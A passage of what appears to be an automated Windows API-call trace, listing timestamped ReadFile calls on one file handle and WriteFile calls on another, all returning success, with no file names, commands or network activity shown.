lpOverlapped=0x0) returned 1 [0021.010] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0xf1, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.011] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.011] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.012] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x6a, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.012] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.013] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.013] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x84, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.014] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.014] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.015] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.015] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.016] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.016] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.017] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.017] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.018] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.018] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1fc, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.019] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.019] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.020] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.021] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x10e, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.021] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.021] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.022] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.023] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2bf, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.023] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.024] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.024] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.025] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x301, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.025] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.026] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x329, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.026] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.027] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.027] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.028] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2de, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.028] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.029] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x27a, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.029] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.030] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x326, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.030] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.031] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2ad, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.031] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.032] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x354, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.032] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.033] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x360, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.033] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.034] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3aa, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.034] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.035] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.035] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x11b, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.036] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.036] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.037] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x169, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.037] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.038] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.038] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x22e, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.039] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.039] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3d6, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.040] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.040] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2bf, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.041] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.042] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x33a, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.042] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.043] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2ff, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.043] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.044] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x373, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.044] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.045] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3fb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.045] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.046] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.046] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0xd5, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.047] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.047] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.048] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2ad, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.048] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.049] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x376, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.049] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.050] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2ed, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.050] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.051] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3c1, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.051] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.052] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.052] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x11f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.052] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.053] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.054] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.054] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.054] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x38a, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.055] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.056] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3ee, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.056] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.056] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x33b, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.057] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.057] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x387, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.058] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.058] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2ab, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.059] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.059] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x261, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.060] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.060] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, 